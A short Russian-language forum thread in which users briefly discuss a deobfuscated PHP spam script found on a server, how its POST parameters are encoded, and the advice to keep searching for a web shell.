154. gistymva /151 22.12.2012 00:13 Gajim3228BFA2

много таких запросов приходит?

155. gistygisty /154 22.12.2012 00:37 Gajim3228BFA2

я процентов 70 где-то деобфусцировал, дальше мне лень. в общем это банальный пхп-спемер:
http://paste.pirate-party.ru/3e107dc3.tx...
а то, что на него приходит пост-запросом — банально что куда и кому слать.
так что ищи дальше шелл

156. gistymva /153 22.12.2012 00:49 Gajim3228BFA2

там по первой букве в названии переменной пост-запроса определяется какой тип данных в переменной. например, если первая l — мыло кому слать сообщение и т.д. дальше мне лень разбираться было, но если инетересно, можно раскодировать, что в твоих пост-запросах присылали и посмотреть как там что устроено.

157. mvagisty /154 22.12.2012 03:11 N900

довольно много, да

158. kurkuma 22.12.2012 18:29

готов для десктопа!

Do you really want to delete ?